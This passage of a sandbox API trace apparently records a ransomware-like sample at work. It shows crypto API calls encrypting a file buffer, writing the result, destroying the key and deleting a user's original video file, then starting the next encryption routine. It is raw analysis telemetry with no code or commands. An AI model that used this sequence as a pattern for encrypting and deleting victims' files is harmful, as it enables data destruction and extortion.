(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0099.069] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0099.069] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e27e0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27e0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0099.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.121] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.121] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.121] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0099.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0099.122] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.122] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.122] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.122] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0099.123] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xbbf4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xbc00) returned 1 [0099.123] CharLowerBuffW (in: lpsz="byte[48129]", cchLength=0xb | out: lpsz="byte[48129]") returned 0xb [0099.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca850, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0099.123] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4539410*, pdwDataLen=0x144e538*=0xbbf4, dwBufLen=0xbc00 | out: pbData=0x4539410*, pdwDataLen=0x144e538*=0xbc00) returned 1 [0099.184] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0099.184] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0099.184] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.184] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xbc00, lpOverlapped=0x0) returned 1 [0099.187] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca5c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0099.187] CryptDestroyKey (hKey=0x41ac280) returned 1 [0099.187] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.187] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.187] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0099.188] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0099.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.188] FreeLibrary (hLibModule=0x756e0000) returned 1 [0099.188] CloseHandle (hObject=0x258) returned 1 [0099.188] CloseHandle (hObject=0x298) returned 1 [0099.190] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4", lpFilePart=0x0) returned 0x34 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0099.191] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\goxwto2-sz.mp4")) returned 0x20 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0099.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0099.191] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b1a42a0, ftCreationTime.dwHighDateTime=0x1d5ea66, ftLastAccessTime.dwLowDateTime=0xdc3b0be0, ftLastAccessTime.dwHighDateTime=0x1d5ea53, ftLastWriteTime.dwLowDateTime=0xdc3b0be0, ftLastWriteTime.dwHighDateTime=0x1d5ea53, nFileSizeHigh=0x0, nFileSizeLow=0xbbf4, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="gOxwTO2-sZ.mp4", cAlternateFileName="GOXWTO~1.MP4")) returned 0x41ac700 [0099.192] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\goxwto2-sz.mp4")) returned 1 [0099.233] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b1a42a0, ftCreationTime.dwHighDateTime=0x1d5ea66, ftLastAccessTime.dwLowDateTime=0xdc3b0be0, ftLastAccessTime.dwHighDateTime=0x1d5ea53, ftLastWriteTime.dwLowDateTime=0xdc3b0be0, ftLastWriteTime.dwHighDateTime=0x1d5ea53, nFileSizeHigh=0x0, nFileSizeLow=0xbbf4, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="gOxwTO2-sZ.mp4", cAlternateFileName="GOXWTO~1.MP4")) returned 0 [0099.233] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0099.233] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0099.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0099.234] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0099.234] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0099.234] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0099.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0099.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0099.234] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0099.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0099.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0099.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0099.235] 